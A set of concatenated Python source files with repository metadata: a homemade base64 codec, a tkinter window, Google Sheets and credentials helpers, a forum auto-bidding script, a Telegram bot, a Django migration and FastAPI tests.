] | 9 | 2019-04-16T18:50:48.000Z | 2022-03-15T11:57:02.000Z | encdecpy/base64.py | IronVenom/encdecpy | cca838765e55af846484eebb71f1f49645d147c6 | [
"MIT"
] | null | null | null | encdecpy/base64.py | IronVenom/encdecpy | cca838765e55af846484eebb71f1f49645d147c6 | [
"MIT"
] | 1 | 2021-08-13T16:00:28.000Z | 2021-08-13T16:00:28.000Z | # Dictionaries for base64 encoding and decoding.
encode_dict = {0:'A',1:'B',2:'C',3:'D',4:'E',5:'F',6:'G',7:'H',8:'I',9:'J',10:'K',11:'L',12:'M',13:'N',14:'O',15:'P',16:'Q',17:'R',18:'S',19:'T',20:'U',21:'V',22:'W',
23:'X',24:'Y',25:'Z',26:'a',27:'b',28:'c',29:'d',30:'e',31:'f',32:'g',33:'h',34:'i',35:'j',36:'k',37:'l',38:'m',39:'n',40:'o',41:'p',42:'q',43:'r',44:'s'
,45:'t',46:'u',47:'v',48:'w',49:'x',50:'y',51:'z',52:'0',53:'1',54:'2',55:'3',56:'4',57:'5',58:'6',59:'7',60:'8',61:'9',62:'+',63:"/"}
decode_dict = {a:b for b,a in encode_dict.items()}
class base64:
def encode(string):
binstream = ''
for i in string:
binstream+='0'*(8-len(f"{ord(i):b}"))+f"{ord(i):b}"
extra = 0
if len(binstream)%3!=0:
if len(binstream)%3 == 2:
binstream = '0'*16 + binstream
extra = 1
else:
binstream = '0'*8 + binstream
extra = 2
encode_bin = []
for i in range(0,int(len(binstream)//6)):
encode_bin.append(binstream[6*i:6*(i+1):1])
encoded_string = ''
for i in encode_bin:
encoded_string+=encode_dict[int(i,2)]
return encoded_string+'='*extra
def decode(string):
decode_stream = ''
newstring = ''
if string[-1] == '=':
if string[-2] == '=':
newstring = string[:-2]
for i in newstring:
decode_stream+='0'*(6-len(f"{decode_dict[i]:b}"))+f"{decode_dict[i]:b}"
decode_l = []
decode_stream = '0'*8 + decode_stream
for i in range(0,int(len(decode_stream)/8)):
decode_l.append(chr(int(decode_stream[i*8:8*(i+1):1],2)))
return ''.join(decode_l[2:])
else:
newstring = string[:-1]
for i in newstring:
decode_stream+='0'*(6-len(f"{decode_dict[i]:b}"))+f"{decode_dict[i]:b}"
decode_l = []
decode_stream = '0'*16 + decode_stream
for i in range(0,int(len(decode_stream)/8)):
decode_l.append(chr(int(decode_stream[i*8:8*(i+1):1],2)))
return ''.join(decode_l[4:])
else:
for i in string:
decode_stream+='0'*(6-len(f"{decode_dict[i]:b}"))+f"{decode_dict[i]:b}"
decode_l = []
for i in range(0,int(len(decode_stream)/8)):
decode_l.append(chr(int(decode_stream[i*8:8*(i+1):1],2)))
return ''.join(decode_l) | 34.612903 | 166 | 0.567102 |
aba69264e1ac48abb0bcfe70f1af9670b4edc6a2 | 590 | py | Python | views/windows/basewindow.py | RamonWill/portfolio-management-project | ac8ce313f8d62f09810fc1da19d6b252f193871b | [
"MIT"
] | 14 | 2020-01-01T04:59:06.000Z | 2022-02-08T06:48:21.000Z | views/windows/basewindow.py | linhvien/portfolio-management-project | ac8ce313f8d62f09810fc1da19d6b252f193871b | [
"MIT"
] | null | null | null | views/windows/basewindow.py | linhvien/portfolio-management-project | ac8ce313f8d62f09810fc1da19d6b252f193871b | [
"MIT"
] | 8 | 2020-10-15T06:52:37.000Z | 2021-10-04T06:44:36.000Z | import tkinter as tk
class BaseWindow(tk.Toplevel):
def __init__(self):
super().__init__()
self.base_frame = tk.Frame(self)
self.base_frame.pack(fill="both", expand="true")
self.base_frame.pack_propagate(0)
self.frame_styles = {
"relief": "groove",
"bd": 3,
"bg": "#94b4d1",
"fg": "#073bb3",
"font": ("Arial", 9, "bold"),
}
self.text_styles = {
"font": ("Verdana", 10),
"background": "#3F6BAA",
"foreground": "#E1FFFF",
}
| 24.583333 | 56 | 0.476271 |
aba82608b365c3add79167593a64438d0fe2fb8a | 963 | py | Python | sync/auth.py | tstodden/google-sheets-sync | d3b73b9a2b76da1fabc6d0b1db43fc6b71fd0d23 | [
"MIT"
] | null | null | null | sync/auth.py | tstodden/google-sheets-sync | d3b73b9a2b76da1fabc6d0b1db43fc6b71fd0d23 | [
"MIT"
] | null | null | null | sync/auth.py | tstodden/google-sheets-sync | d3b73b9a2b76da1fabc6d0b1db43fc6b71fd0d23 | [
"MIT"
] | null | null | null | import os
from typing import NamedTuple
from google.oauth2.service_account import Credentials as OAuthCredentials
from .constants import OAUTH_CONFIG_PATH, OAUTH_SCOPES
class PostgresCredentials:
def __init__(self):
self.host = os.environ.get("SYNC_DB_HOST")
self.dbname = os.environ.get("SYNC_DB_NAME")
self.user = os.environ.get("SYNC_DB_USER")
self.password = os.environ.get("SYNC_DB_PASSWORD")
class Credentials(NamedTuple):
postgres: PostgresCredentials
oauth: OAuthCredentials
class CredentialsController:
    """Assembles the combined ``Credentials`` bundle (Postgres + Google OAuth)."""

    def get(self) -> Credentials:
        """Return Postgres credentials (from env vars) plus Google OAuth credentials."""
        credentials = Credentials(
            postgres=PostgresCredentials(), oauth=self._get_creds_from_google()
        )
        return credentials

    def _get_creds_from_google(self) -> OAuthCredentials:
        """Load service-account credentials from OAUTH_CONFIG_PATH with OAUTH_SCOPES."""
        credentials = OAuthCredentials.from_service_account_file(
            OAUTH_CONFIG_PATH, scopes=OAUTH_SCOPES
        )
        return credentials
| 28.323529 | 79 | 0.718588 |
aba8585d9a6da63e6cb8ee1a4fa109ef589d5a83 | 9,993 | py | Python | autobidder.py | planet-winter/forumbidder | f80f1893b8bb7284f3ca0a95f184812b5c4a0244 | [
"MIT"
] | null | null | null | autobidder.py | planet-winter/forumbidder | f80f1893b8bb7284f3ca0a95f184812b5c4a0244 | [
"MIT"
] | null | null | null | autobidder.py | planet-winter/forumbidder | f80f1893b8bb7284f3ca0a95f184812b5c4a0244 | [
"MIT"
] | null | null | null | #!/usr/bin/python
import requests
import json
import re
import mechanize
import cookielib
import sys
from BeautifulSoup import BeautifulSoup
# Variables
engaged = False
#topic_url="https://www.kvraudio.com/forum/viewtopic.php?f=1&t=470835"
topic_url = "http://www.kvraudio.com/forum/viewtopic.php?f=1&t=492028"
#topic_post_url = "https://www.kvraudio.com/forum/posting.php?mode=reply&f=1&t=470835"
topic_post_url = "https://www.kvraudio.com/forum/posting.php?mode=reply&f=1&t=492028"
# replace topic t= with current topic
topic_search_url = "https://www.kvraudio.com/forum/search.php?keywords=XXXXXXXX&t=492028&sf=msgonly"
login_url = "https://www.kvraudio.com/forum/ucp.php?mode=login"
username = "planetw"
password = "XYZ"
# max amount to bid for all software packages
total_max_bid = 600
software = {
"Twolegs Bundle": {
"search": "twolegs%20bundle",
"amount": 5,
"regex": re.compile('Twolegs.+Bundle.*?\$+.+([1-9][0-9]*[0,5])', flags=re.IGNORECASE),
"max_bid": 15,
"bids": [], #("bidderuser", int)
},
"TimeWARP2600": {
"search": "timewarp2600",
"amount": 5,
"regex": re.compile('Time\s?Warp2600.*?([1-9][0-9]*[0,5])', flags=re.IGNORECASE),
"max_bid": 60,
"bids": [], #("bidderuser", int)
},
"VSTBuzz 300 voucher": {
"search": "VSTBuzz%20voucher",
"amount": 1,
"regex": re.compile('VSTBuzz.*?voucher.*?([1-9][0-9]*[0,5])', flags=re.IGNORECASE),
"max_bid": 250,
"bids": [], #("bidderuser", int)
},
"Scaler plugin": {
"search": "scaler%20plugin",
"amount": 1,
"regex": re.compile('Scaler.+plugin.*?([1-9][0-9]*[0,5])', flags=re.IGNORECASE),
"max_bid": 10,
"bids": [], #("bidderuser", int)
},
# "Addictive Drums 2 Custom": {
# "search": "addictive%20drums%20custom",
# "amount": 1,
# "regex": re.compile('Addictive.*?Drums.*?2.*?Custom.*?([1-9][0-9]*[0,5])', flags=re.IGNORECASE),
# "max_bid": 1,
# "bids": [], #("bidderuser", int)
# },
"Reaper Commercial License": {
"search": "reaper%20commercial%20license",
"amount": 2,
"regex": re.compile('reaper.+commercial.+license.*?([1-9][0-9]*[0,5])', flags=re.IGNORECASE),
"max_bid": 60,
"bids": [], #("bidderuser", int)
},
# "Melodyne 4 Studio License": {
# "search": "melodyne%204%20license",
# "amount": 1,
# "regex": re.compile('Melodyne.*?4.*?Studio.*?License.*?([1-9][0-9]*[0,5])', flags=re.IGNORECASE),
# "max_bid": 1,
# "bids": [], #("bidderuser", int)
# },
# "Synth Magic Bundle 5": {
# "search": "synth%20magic%205",
# "amount": 5,
# "regex": re.compile('Synth.*?Magic.*?Bundle.*?5*?([1-9][0-9]*[0,5])', flags=re.IGNORECASE),
# "max_bid": 60,
# "bids": [], #("bidderuser", int)
# },
# "Studio Session Pack": {
# "search": "studio%20session%20pack",
# "amount": 3,
# "regex": re.compile('Studio.*?Session.*?Pack.*?([1-9][0-9]*[0,5])', flags=re.IGNORECASE),
# "max_bid": 1,
# "bids": [], #("bidderuser", int)
# },
"TAL Coupon": {
"search": "tal%20coupon",
"amount": 5,
"regex": re.compile('TAL.*?Coupon.*?([1-9][0-9]*[0,5])', flags=re.IGNORECASE),
"max_bid": 100,
"bids": [], #("bidderuser", int)
},
"PSP EffectPack": {
"search": "PSP%20Effect%20Pack",
"amount": 1,
"regex": re.compile('PSP.*?Effect.*?Pack.*?([1-9][0-9]*[0,5])', flags=re.IGNORECASE),
"max_bid": 150,
"bids": [], #("bidderuser", int)
},
"MPowerSynth": {
"search": "mpowersynth",
"amount": 1,
"regex": re.compile('Power.*?Synth.*?([1-9][0-9]*[0,5])', flags=re.IGNORECASE),
"max_bid": 80,
"bids": [], #("bidderuser", int)
}
}
total_bid_sum = 0
def login(username, password):
    """Log into the KVR forum and return an authenticated mechanize Browser.

    Note: this is Python 2 code; mechanize/cookielib are legacy libraries.
    """
    # Browser with its own cookie jar so the login session persists.
    br = mechanize.Browser()
    cj = cookielib.LWPCookieJar()
    br.set_cookiejar(cj)
    # Browser options: ignore robots.txt, follow redirects/refreshes,
    # and present a common User-agent so the forum accepts the requests.
    br.set_handle_equiv(True)
    br.set_handle_gzip(False)
    br.set_handle_redirect(True)
    br.set_handle_referer(True)
    br.set_handle_robots(False)
    br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
    br.addheaders = [('User-agent', 'Chrome')]
    # Open the login page; the cookie jar keeps the session afterwards.
    br.open(login_url)
    # Debug helper kept for reference:
    #for f in br.forms():
    #    print f
    # The login form is the first (index zero) form on the page.
    br.select_form(nr=0)
    # Fill in the user credentials and submit.
    br.form['username'] = username
    br.form['password'] = password
    br.submit()
    return br
def search_software(browser,software_name):
    """Search the auction thread for bids on one software package.

    Parses the forum search results and appends any found (user, amount)
    bid tuples to software[software_name]["bids"], kept sorted ascending
    by amount. Python 2 / BeautifulSoup 3 code.
    """
    sw = software[software_name]
    print "searching for", software_name
    # Single search request; XXXXXXXX in the URL template is the keyword slot.
    response = browser.open(topic_search_url.replace("XXXXXXXX", sw["search"])).read()
    soup = BeautifulSoup(response)
    # All matching posts except the last one (the initial auction post).
    posts = soup.findAll("div",{"class": "inner"})[:-1]
    #posts_content = posts.findAll("div",{"class": "content"})
    for post in posts:
        re_software = re.compile(sw["regex"])
        #post_content_soup = BeautifulSoup(post)
        post_content = post.findAll("div",{"class": "content"})
        if not post_content:
            print "WARNING: no post content found something wrong?!, skipping software"
            return
        # NOTE(review): findAll returns a result list; `.text` here relies on
        # BeautifulSoup 3 ResultSet behavior -- verify against the BS version used.
        latest_bid = re_software.findall(post_content.text)
        if latest_bid:
            latest_bid = latest_bid[0]
            latest_bid_user_soup = post.findAll("dt",{"class": "author"})[0]
            latest_bid_user = latest_bid_user_soup.text.strip("by")
            # Exclude the auction admin's initial post.
            if latest_bid_user != "Luftrum":
                print "Found bid from user", latest_bid_user, "$", latest_bid, "for", software_name
                bid = (latest_bid_user, int(latest_bid))
                software[software_name]["bids"].append(bid)
                # Keep bids sorted ascending by amount.
                software[software_name]["bids"].sort(key=lambda x: x[1])
def bid_software(browser,software_name):
    """Decide whether to outbid the current lowest relevant bid and post it.

    Refreshes the bid list, then bids only when we are not already among
    the winning bids, the new price stays under the package's max_bid, and
    the running total stays under total_max_bid. Posts to the forum only
    when the module-level `engaged` flag is True. Python 2 code.
    """
    search_software(browser, software_name)
    global total_bid_sum
    amount = software[software_name]["amount"]
    max_bid = software[software_name]["max_bid"]
    software_bids = software[software_name]["bids"]
    # Only the `amount` lowest bids matter: that many packages are on offer.
    relevant_bids = software_bids[:amount]
    print "found the last relevant bids", relevant_bids
    # Don't outbid ourselves if we already hold one of the winning bids.
    if [ bid for bid in relevant_bids if bid[0] == username]:
        print "not bidding. we would overbid ourselve"
    else:
        # Only the lowest relevant bid needs to be overbid.
        if len(software[software_name]["bids"]) < amount:
            # Fewer bids than packages: the minimum bid wins a package.
            print "bidding min amount as there are more packages than bids"
            bid_price = 5
        else:
            relevant_min_bid_price = software[software_name]["bids"][0][1]
            # Increment: +$5 below $100, +$10 at or above.
            if relevant_min_bid_price < 100:
                bid_price = relevant_min_bid_price + 5
            else:
                bid_price = relevant_min_bid_price + 10
        # Never exceed the per-package ceiling.
        if bid_price >= max_bid:
            print "bid would exceed software's max_bid parameter"
            return
        # Never exceed the overall budget.
        if total_bid_sum + bid_price >= total_max_bid:
            print "total bid price exeeds total_max_bid parameter"
            print "out of funds"
            return
        if engaged:
            # Live mode: actually post the bid to the forum reply form.
            browser.open(topic_post_url)
            # Debug helper kept for reference:
            #for f in browser.forms():
            #    print "FORM:"
            #    print f
            # The reply form is the first (index zero) form on the page.
            browser.select_form(nr=0)
            message = "Bidding for " + software_name + " $" + str(bid_price)
            browser.form['message'] = message
            browser.method = 'POST'
            # Submit via the 'post' button.
            response = browser.submit(name='post')
            print "placed bid in forum:", message
            total_bid_sum += bid_price
            print "TOTAL bid sum so far:", total_bid_sum
        else:
            # Dry-run mode: report what would have been bid.
            print "not engaged: would be BIDDING $", bid_price, "on", software_name
def main():
    """Log in, show usage warnings, then loop bidding over every package.

    Runs forever in live mode (`engaged` True); performs a single cycle
    and exits otherwise. Python 2 code (raw_input, print statements).
    """
    browser = login(username,password)
    print "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
    print "This script bids in the KVR audio forum charity - bid for the charity!"
    print "make sure to adjust the parameters in the variable section well"
    print "the used forum search does not always return all necessary results as people spell the packages differently"
    print "also pay attention to the regexpressions not to be too greedy and match wrong numbers"
    print "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
    # Require explicit confirmation before touching the forum.
    raw_input("Press Enter to continue...")
    while True:
        for software_name in software:
            bid_software(browser, software_name)
        print "------------------------------------------------"
        print "TOTAL bid sum:", total_bid_sum, "after this cycle"
        print "------------------------------------------------"
        if not engaged:
            # Dry-run mode only performs one cycle.
            print "ran only once as we are not live (engaged = False)"
            quit()
if __name__ == "__main__":
main()
# Garbage...
# # parse for pagination div
# pagination_div = soup.findAll("div",{"class": "pagination"})[0]
# thread_last_page_url = pagination_div.findAll("a")[-1]["href"]
# number = re.compile('\d+')
# thread_nr_of_posts = number.match(pagination_div.text).group()
# thread_posts_content = soup.findAll("div",{"class": "content"})
| 34.105802 | 119 | 0.566497 |
aba85a8982f79dd5cfad67d945512f5c715817c8 | 371 | py | Python | office_tracker/leave_tracker/apps.py | tanvir002700/tracker | 567c3be2f36ac120fb412c06126cbd8fa72be4b9 | [
"MIT"
] | null | null | null | office_tracker/leave_tracker/apps.py | tanvir002700/tracker | 567c3be2f36ac120fb412c06126cbd8fa72be4b9 | [
"MIT"
] | 11 | 2020-06-05T18:04:42.000Z | 2022-03-11T23:19:32.000Z | office_tracker/leave_tracker/apps.py | tanvir002700/tracker | 567c3be2f36ac120fb412c06126cbd8fa72be4b9 | [
"MIT"
] | null | null | null | from django.apps import AppConfig
from django.db.models.signals import post_save
from django.apps import apps
from .signals import assign_season_to_all_user
class LeaveTrackerConfig(AppConfig):
    """Django app config that wires the Season post-save signal on startup."""

    name = 'leave_tracker'

    def ready(self):
        """Connect assign_season_to_all_user to post_save of the Season model."""
        # Resolve the model lazily; importing it at module level would run
        # before the app registry is ready.
        Season = apps.get_model('leave_tracker', 'Season')
        post_save.connect(assign_season_to_all_user, sender=Season)
| 30.916667 | 67 | 0.773585 |
abab9d30016bdfbdb016a1d0c85da2a580756ebd | 5,970 | py | Python | accounts.py | SurajOliver/tradense | 9f14b6114be1b5753f0252f081e6efb7c26abf19 | [
"MIT"
] | null | null | null | accounts.py | SurajOliver/tradense | 9f14b6114be1b5753f0252f081e6efb7c26abf19 | [
"MIT"
] | null | null | null | accounts.py | SurajOliver/tradense | 9f14b6114be1b5753f0252f081e6efb7c26abf19 | [
"MIT"
] | null | null | null | import datetime
import numpy as np
import pandas as pd
from google.oauth2 import service_account
from googleapiclient import discovery
SPREADSHEET_ID = "1otVI0JgfuBDJw8jlW_l8vHXyfo5ufJiXOqshDixazZA" # ALL-IN-ONE-LOG-2021
class Spreadsheet:
    """Thin wrapper around the Google Sheets API for one spreadsheet."""

    def __init__(self, spreadsheetId):
        # Spreadsheet document id; the authenticated sheet resource is
        # created eagerly on construction.
        self.spreadsheetId = spreadsheetId
        self.sheet = self.get_all_in_one_log()

    def get_all_in_one_log(self):
        """Authenticate via the local service-account file and return the
        spreadsheets() API resource."""
        SERVICE_ACCOUNT_FILE = "credentials.json"
        SCOPES = ["https://www.googleapis.com/auth/spreadsheets"]
        creds = service_account.Credentials.from_service_account_file(
            SERVICE_ACCOUNT_FILE, scopes=SCOPES
        )
        service = discovery.build("sheets", "v4", credentials=creds)
        sheet = service.spreadsheets()
        return sheet

    def getSheet(self):
        """Return the cached spreadsheets() API resource."""
        return self.sheet
def list_last_five_trans():
    """Print the last 5 transactions from the Trans sheet (module-global `sheet`)."""
    result = (
        sheet.values().get(spreadsheetId=SPREADSHEET_ID, range="Trans!B6:G").execute()
    )
    values = result.get("values", [])
    df = pd.DataFrame(
        values, columns=["Date", "Description", "Dummy", "Amount", "From A/c", "To A/c"]
    )
    # Truncate descriptions so the table stays narrow on screen.
    df["Description"] = df["Description"].str.slice(0, 20)
    print(df.tail(5))
    return
def list_last_30_trans():
    """Print the last 30 transactions from the Trans sheet (module-global `sheet`)."""
    result = (
        sheet.values().get(spreadsheetId=SPREADSHEET_ID, range="Trans!B6:G").execute()
    )
    values = result.get("values", [])
    df = pd.DataFrame(
        values, columns=["Date", "Description", "Dummy", "Amount", "From A/c", "To A/c"]
    )
    # Truncate descriptions so the table stays narrow on screen.
    df["Description"] = df["Description"].str.slice(0, 20)
    print(df.tail(30))
    return
def check_balances():
    """Fetch the Dashboard balance column and print a per-account summary.

    Reads eleven balances from Dashboard!P9:P19, replaces "#N/A" cells with
    zero, and unpacks them positionally -- the order must match the sheet's
    row layout exactly.
    """
    # Account labels from column B; fetched but currently unused.
    res2 = (
        sheet.values()
        .get(spreadsheetId=SPREADSHEET_ID, range="Dashboard!B9:B19")
        .execute()
    )
    acc = res2.get("values", [])
    result = (
        sheet.values()
        .get(spreadsheetId=SPREADSHEET_ID, range="Dashboard!P9:P19")
        .execute()
    )
    val = result.get("values", [])
    balances = np.array(val)
    balances = balances.flatten()
    # Cells with failed sheet formulas come back as the string "#N/A".
    balances[balances == "#N/A"] = "0"
    balances = list(map(float, balances))
    # Positional unpack: order must mirror rows 9-19 of the Dashboard sheet.
    (
        C,
        K,
        Zer,
        Zer_Comm,
        Cams,
        Samrudhi,
        Citi,
        K_Fixed,
        Union,
        Z_Hold,
        Citi_Fixed,
    ) = balances
    print(f"Cash Balance~~~~~~~~~~~~~~~~~~~~~:{C:.2f}")
    print(
        f"Saving A/c Balance~~~~~~~~~~~~~~~:{(K+Citi):.2f} with (Kotak-{K:.2f} and Citi-{Citi:.2f})"
    )
    print(
        f"In FD (CB,Kotak,Union, Samruddhi):{(K_Fixed+Union+Citi_Fixed):.2f} with (K-{K_Fixed:.2f}, Citi-{Citi_Fixed:.2f})"
    )
    print(f"Unutilized in Shares~~~~~~~~~~~~~:{Zer:.2f}")
    print(f"In CAMS MF~~~~~~~~~~~~~~~~~~~~~~~:{Cams:.2f}")
    print(f"In shares~~~~~~~~~~~~~~~~~~~~~~~~:{Z_Hold:.2f}")
    return
def check_expenses():
    """Print the yearly expense total from the single Dashboard!C46 cell."""
    result = (
        sheet.values()
        .get(spreadsheetId=SPREADSHEET_ID, range="Dashboard!C46:C46")
        .execute()
    )
    values = result.get("values", [])
    # values is [[cell]]; an empty cell would raise IndexError here.
    print("Expenses for the year: " + values[0][0])
    return
class Account:
    """One ledger transaction prepared as a row for the Trans sheet."""

    def __init__(self, desc, amount, from_ac, to_ac):
        """Capture the transaction fields and build the sheet row.

        Money leaving cash ("C") or Kotak ("K") is categorized as an
        Expense; any other movement is an inter-account Adjustment.
        """
        self.desc = desc
        self.amount = amount
        self.from_ac = from_ac
        self.to_ac = to_ac
        self.catg = "Expense" if from_ac in ("C", "K") else "Adjustment"
        # Timestamp the transaction with today's date in both the monthly
        # period form (YYYY-MM) and the sheet's date form (MM/DD/YYYY).
        self.today = datetime.datetime.now()
        self.period = self.today.strftime("%Y-%m")
        self.formatted_dt = self.today.strftime("%m/%d/%Y")
        # Single-row payload in the sheet's column order; the empty
        # strings are placeholder columns.
        row = [
            self.formatted_dt,
            self.desc,
            "",
            self.amount,
            self.from_ac,
            self.to_ac,
            "",
            self.period,
            self.catg,
        ]
        self.new_trans = [row]

    def get_trans(self):
        """Return the transaction as a list containing one row list."""
        return self.new_trans
def add_new_record():
    """Interactively collect one transaction and append it to the Trans sheet.

    Prompts for the four fields, shows the row for confirmation, and only
    appends after the user enters 1 (9 aborts without writing).
    """
    print("Adding new records, Enter description, amount, from a/c and to a/c")
    desc = input("description is: ")
    amount = input("trans amount: ")
    from_ac = input(" from account: ")
    to_ac = input(" to account: ")
    account = Account(desc, amount, from_ac, to_ac)
    print(" Transaction to be entered is: ", account.get_trans())
    # Loop until the user explicitly confirms (1) or aborts (9).
    conf = 0
    while conf != 1 and conf != 9:
        conf = int(input(" Enter 1 to confirm, 9 to erase: "))
    if conf == 9:
        print("Exiting adding new record, please re-enter your choice: ")
        return
    # Append the confirmed row via the module-global `sheet` resource.
    request = sheet.values().append(
        spreadsheetId=SPREADSHEET_ID,
        range="Trans!B6:J",
        valueInputOption="USER_ENTERED",
        insertDataOption="INSERT_ROWS",
        body={"values": account.get_trans()},
    )
    response = request.execute()
    print("Added new record: ")
    print(response)
    return
class Choice:
    """Interactive main-menu dispatcher mapping menu numbers to actions."""

    # Menu number -> handler function; 9 (quit) is handled in get_choice.
    switcher = {
        1: add_new_record,
        4: list_last_30_trans,
        5: list_last_five_trans,
        6: check_balances,
        7: check_expenses,
    }

    def __init__(self, SpreadSheet):
        """Store the caller's spreadsheet wrapper and reset menu state.

        Bug fix: the original assigned the module-level ``Spreadsheet``
        class (note the different capitalization) instead of the
        ``SpreadSheet`` argument passed by the caller.
        """
        self._choice = 0
        self.exit = False
        self.Spreadsheet = SpreadSheet

    def is_exit(self):
        """Return True once the user has selected 9 (quit)."""
        return self.exit

    def get_choice(self):
        """Prompt for a menu number, remember it, and flag quit on 9."""
        print("~~~~~~ MAIN MENU ~~~~~~~")
        print("1:ADD, 4:LIST-30, 5:LIST-5, 6:CHECK-BALANCE, 7:.CHECK-EXPENSES 9: Quit")
        self._choice = int(input("Enter your choice : "))
        if self._choice == 9:
            self.exit = True
        return self._choice

    def switch_choice(self):
        """Run the handler for the last chosen number; unknown numbers are no-ops."""
        func = self.switcher.get(self._choice, lambda: "Invalid choice")
        func()
if __name__ == "__main__":
    # Build the spreadsheet wrapper and expose its API resource as the
    # module-global `sheet` used by all the listing/append functions.
    AccountSheet = Spreadsheet(SPREADSHEET_ID)
    sheet = AccountSheet.getSheet()
    # sheet = get_all_in_one_log()
    # list_last_five_trans()
    # Menu loop: prompt and dispatch until the user picks 9 (quit).
    choice = Choice(AccountSheet)
    while choice.is_exit() == False:
        choice.get_choice()
        choice.switch_choice()
    print("Exiting out.. kind regards!")
| 27.638889 | 123 | 0.574372 |
abac1a3c955f1251fb90f89726bf46a055cf6faa | 1,513 | py | Python | bot.py | googlewaitme/picture-bot | ecdbb7b925f11c073e654a403aca4c91d7cbde6d | [
"MIT"
] | null | null | null | bot.py | googlewaitme/picture-bot | ecdbb7b925f11c073e654a403aca4c91d7cbde6d | [
"MIT"
] | null | null | null | bot.py | googlewaitme/picture-bot | ecdbb7b925f11c073e654a403aca4c91d7cbde6d | [
"MIT"
] | null | null | null | import telebot
import settings
import helpers
from models import User
bot = telebot.TeleBot(settings.token, parse_mode=None)
users = dict()
@bot.message_handler(commands=['start', 'help'])
def send_help(message):
    """Handle /start and /help: register the chat (if new) and send the help text."""
    if not message.chat.id in users:
        # First contact with this chat: create its per-chat settings object.
        users[message.chat.id] = User()
    bot.reply_to(message, settings.help_message)
@bot.message_handler(commands=['list_themes'])
def send_themes_list(message):
    """Handle /list_themes: reply with the available color themes."""
    bot.reply_to(message, settings.themes_list)
@bot.message_handler(commands=['list_picture_formats'])
def send_generators_list(message):
    """Handle /list_picture_formats: reply with the available image formats."""
    bot.reply_to(message, settings.generators_list)
@bot.message_handler(func=helpers.check_new_image_format)
def set_new_image_format(message):
    """Set the chat's image format when the message matches the format filter."""
    if not message.chat.id in users:
        # First contact with this chat: create its per-chat settings object.
        users[message.chat.id] = User()
    users[message.chat.id].set_image_generator(message.text)
    # Reply text (Russian): "New image format set!"
    bot.reply_to(message, 'Новый формат изображения установлен!')
@bot.message_handler(func=helpers.check_new_color_theme)
def set_color_theme(message):
    """Set the chat's color theme when the message matches the theme filter."""
    if not message.chat.id in users:
        # First contact with this chat: create its per-chat settings object.
        users[message.chat.id] = User()
    users[message.chat.id].set_color_theme(message.text)
    # Reply text (Russian): "New theme set!"
    bot.reply_to(message, 'Новая тема установлена!')
@bot.message_handler(func=lambda message: True)
def send_image(message):
    """Catch-all handler: render the message text as an image and send it back.

    Chats that have not been registered yet (no /start etc.) get the help
    message instead of an image.
    """
    print(message.chat.id)
    if message.chat.id not in users:
        bot.reply_to(message, settings.help_message)
    else:
        helpers.generate_image(text=message.text, user=users[message.chat.id], filename='photo.jpg')
        # Use a context manager so the file handle is closed after sending
        # (the original leaked the handle opened here).
        with open('photo.jpg', 'rb') as photo:
            bot.send_photo(message.chat.id, photo)
bot.polling()
| 28.54717 | 94 | 0.777925 |
abac74889730121207b018502893e78b98c8747a | 422 | py | Python | apps/users/migrations/0008_user_roles.py | andipandiber/CajaAhorros | cb0769fc04529088768ea650f9ee048bd9a55837 | [
"MIT"
] | null | null | null | apps/users/migrations/0008_user_roles.py | andipandiber/CajaAhorros | cb0769fc04529088768ea650f9ee048bd9a55837 | [
"MIT"
] | 8 | 2021-03-30T13:39:24.000Z | 2022-03-12T00:36:15.000Z | apps/users/migrations/0008_user_roles.py | andresbermeoq/CajaAhorros | cb0769fc04529088768ea650f9ee048bd9a55837 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.7 on 2020-07-08 15:41
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated Django migration: adds the many-to-many `roles` field to User."""

    # Must run after the roles app's initial migration and the previous users migration.
    dependencies = [
        ('roles', '0001_initial'),
        ('users', '0007_auto_20200706_0436'),
    ]

    operations = [
        migrations.AddField(
            model_name='user',
            name='roles',
            field=models.ManyToManyField(to='roles.Role'),
        ),
    ]
| 21.1 | 58 | 0.582938 |
abafaffe850f5ad038e992cc605a8658d0b5ae83 | 7,158 | py | Python | app/routers/brandnewday_test.py | nbult/quotes | 3bfe31a0c5c629c4883a2cf10bf582a9f16ea209 | [
"MIT"
] | null | null | null | app/routers/brandnewday_test.py | nbult/quotes | 3bfe31a0c5c629c4883a2cf10bf582a9f16ea209 | [
"MIT"
] | 1 | 2021-08-25T11:12:59.000Z | 2021-08-25T11:12:59.000Z | app/routers/brandnewday_test.py | nickybulthuis/quotes | 3bfe31a0c5c629c4883a2cf10bf582a9f16ea209 | [
"MIT"
] | null | null | null | import json
from datetime import date, datetime
import pytest
import responses
from fastapi.testclient import TestClient
from .brandnewday import funds_cache, quote_cache
from ..main import app
from ..models import Quote
client = TestClient(app)
prefix = '/brandnewday/'
@pytest.fixture(autouse=True)
def clear_cache():
    """Autouse fixture: empty both module caches before every test for isolation."""
    funds_cache.clear()
    quote_cache.clear()
    yield
def setup_get_funds_response():
    """Register a mocked getfundsnew response with two funds (ids 1002 and 1012)."""
    # The real endpoint wraps a JSON-encoded list inside the 'Message' field.
    body = {'Message': json.dumps([{"Key": "1002", "Value": "bnd-wereld-indexfonds-c-hedged"},
                                   {"Key": "1012", "Value": "bnd-wereld-indexfonds-c-unhedged"}])}
    responses.add(responses.GET, 'https://secure.brandnewday.nl/service/getfundsnew/', json=body, status=200)
@responses.activate
def test_get_funds_returns_funds_list():
    """GET on the funds index returns 200 with the two mocked fund names."""
    setup_get_funds_response()
    response = client.get(prefix, allow_redirects=False)
    assert response.status_code == 200
    assert response.json() == ['bnd-wereld-indexfonds-c-hedged', 'bnd-wereld-indexfonds-c-unhedged']
@responses.activate
def test_get_funds_returns_502():
responses.add(responses.GET, 'https://secure.brandnewday.nl/service/getfundsnew/',
body='error', status=502)
response = client.get(prefix, allow_redirects=False)
assert response.status_code == 502
def test_get_quotes_unknown_name_returns_http404():
    """Requesting quotes for a fund name not in the list yields 404."""
    # NOTE(review): unlike the sibling tests this one is not decorated with
    # @responses.activate -- verify the mock registered below is actually used.
    setup_get_funds_response()
    response = client.get(prefix + 'unknown', allow_redirects=False)
    assert response.status_code == 404
@responses.activate
def test_get_quotes_server_error_returns_http502():
setup_get_funds_response()
responses.add(
responses.POST,
url='https://secure.brandnewday.nl/service/navvaluesforfund/',
body='error',
status=500
)
response = client.get(prefix + 'bnd-wereld-indexfonds-c-unhedged')
